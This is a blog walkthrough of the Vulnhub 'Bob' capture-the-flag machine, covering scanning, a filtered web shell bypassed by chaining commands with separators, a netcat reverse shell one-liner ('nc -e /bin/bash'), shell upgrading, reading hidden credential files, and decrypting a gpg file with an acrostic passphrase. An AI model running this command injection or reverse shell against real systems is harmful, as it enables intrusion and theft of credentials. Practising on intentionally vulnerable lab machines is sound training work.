Vulnhub’s Bob:A Walkthrough

Noel Varghese
7 min readJun 12, 2021


Hello readers,

This is a writeup of Bob machine,found on Vulnhub’s platform.The production credits go to c0rruptedb1t.

You can get the machine from here-


Let’s start off,by using ‘netdiscover’ command, to find the victim machine’s IP

The machine running on VMWare is what we want

Conduct the Nmap scan, with stealth and verbose switches enabled. We get,

Nmap scan report


Targeting the FTP Server running on port 21,we try the classic anonymous login attempt. It backfires since the anonymous user requires a password.Keep in mind that the credentials for an anonymous FTP login are:-


Password-<space bar>

Moving our attention to http port, let ‘s power on the Firefox engine and type in the IP Address of the box.

Browsing through each section, we make our way through the website.

Home page

At the ‘News’ section’s page source,we find

Bse64 encoded text

We keep this in mind, and move on.

At the ‘Contact Us’ page, we find a list of people’s names. These could be possible users on the machine/web server.

Heading over to the ‘Login Page’, we find this message:-

No login system to bruteforce our way through. Sigh

Poking through it’s page source, we find the following message left for us.

Web Shell! It sounds more of a reverse shell grab opportunity.

Remember the encoded message that we found earlier, let’s attempt to decrypt it. Storing the string into a file named ‘Decode’ and we perform the following command:-

Command-base64 ‐‐ decode Decode >> Decode

We are in fact storing the decoded result into the same file. Viewing the file’s output,we get:-

passwords.html seems like a possible webpage on the server.Now’ let’s undertake a dirbuster scan on the website

Command-dirb http://<IP>

dirb scan results

Enumerating the ‘robots.txt’ file, we get:-

Enumerating each webpage, we find:-

a)login.php- Does’nt exist

b)dev_shell.php-Looks like a remote machine shell, in which we can enter commands

c)lat_memo.html-Nothing of note from the page source

d)passwords.html-As supected, it is a webpage on the server

Going through the clues that we have, it seems Bob is the web server’s administrator.

I had a strong feeling if the above text was of Ook or Brainfuck format. When analyzing the text using decoders, it was giving out gibberish text.

Shifting our attention to the web shell, we start off by giving simple commands. The shell, belongs to the victim machine and gives out information that we need to know

Command -whoami

Command-sudo -l


How to approach such shells?
When entering commands such as ‘ls’ we were not allowed to view the output/rejected output

What to do?
Usage of ‘;|? or ‘’;;||??

When providing these symbols between two commands,it will raise the possibility of generating output for atleast one command

Example pwd||ls ←(No space) or pwd|ls ←(Output may be generated)

Adopting this approach, we perform a few commands:-

Command-pwd |ls

In the directory listing, we find that there is a file named ‘dev_shell.php.bak’.We attempt to download it.

Comamnd- wget http:<IP>/dev_shell.php.bak

Analyzing it’s contents, we understand that the symbols ‘ and ; are blacklisted, hence providing no output

Blacklisted symbols-; and ‘

GAINING ACCESS’s time to insert our reverse shell. We attempt 4 methods of reverse shell:-

We take the reverse shell code snippets from Pentestmonkey’s cheat sheet-

We set up our command in the web shell, in the following method:-

Command- whoami && <Reverse Shell Snippet Code>

NOTE:Make sure to edit the IP Address,according to your machine’s IP and port of your choice

PHP-Not successful

Python-Not successful

Bash-Not successful

Netcat-For this method, we set up a netcat listener on our terminal

Command-nc -lvp 4444

Command to be run on webshell:-

Command-whoami && nc -e /bin/bash 4444

Upon hitting enter, our netcat listener will gain the reverse shell on Millburg High School’s server

We are currently operating as the ‘www-data’ user and we need a more standard shell. Fortunately, we have a python one-liner command to elevate ourselves


Command-python -c ‘import pty;pty.spawn(“/bin/bash”)’

While viewing the directory listing of /html, we find a file named hint. In attempting to read it’s contents, we are thrown some gibberish as display text. Let’s try the alternate method of using commands ‘head’ and ‘tail’

Command-head .hint

Not finding anything else useful in /html, we switch over to /home.

We find 4 directories:-

a)/bob-Nothing interesting of note, except for a hidden file named ‘.old_passwordfile.html’.Note that the file is not accessible using ‘cat command. Instead we use ‘head’ command(allowing us to read the top portion of the file).From the file, we get,‘seb’ and ‘james’ user’s credentials:-

b)/seb-Nothing interesting of note

c)/james-Nothing interesting of note

d)/elliot-b)/elliot-Within ellliot’s directory, we find a file named ‘theadminisdumb.txt’.Reading it’s contents, we find:-


Having got elliot’s credentials, we login as elliot user.

NOTE:All the while we were working through the directory listing,to discover hidden files

Elliot does not have sudo privilege, nor do we find any writable text files to elevate ourselves through privilege escalation. Clearly, we were missing something

Again moving to /bob, we catch sight of 3 more hidden files within his Documents folder. The directory listing is shown below:-

Targeting the ‘staff.txt’ file first, we get:-

At first glance, we can understand that ‘login.txt’ file is encrypted using GNU Privacy Guard(gpg) encryption. It remains unlocked, till we find a suitable passphrase

‘Secret’ seems to be a directory. It is a nested and we make our way through it. At /No_Lookie_In_Here, the directory listing gives us a file named ‘’

NOTE:It is a large file and we need to apply both ‘head’ and ‘tail’ commands to grab it’s contents

I admit it was not making any sense. This could probably be a conversation between the system’s users, but we are unable to grasp any meaning. More worrying is that we have a file waiting to be decrypted.

In the English language, there exists a term called ‘acrostic’, in which the starting alphabets of sentence, form a complete word. I admit I wasn't aware of such a concept.

Upon closer inspection, we piece together each starting alphabet to form a word:-


Fun trivia- Harpocrates is in fact, the Greek god of Confidentiality and Secrecy

It’s fitting for the machine’s and InfoSec student’s aim.

Using the passphrase to decrypt the file,

Command- gpg ‐ ‐ batch ‐ ‐passphrase HARPOCRAETES -d login.txt.gpg

We extract the following file and it’s contents:-

Having got bob’s credentials,we login as ‘bob’ to find the flag waiting for us in / directory’s listing.



Well,you have it now!


Well. that was a pretty fun box to play.I would defo recommend this machine to any aspiring pentester. Until then,let me find more boxes to pwn!



Noel Varghese
Noel Varghese

Written by Noel Varghese

Threat Researcher at CloudSEK Security+ | eJPT | Connect with me on LinkedIn —

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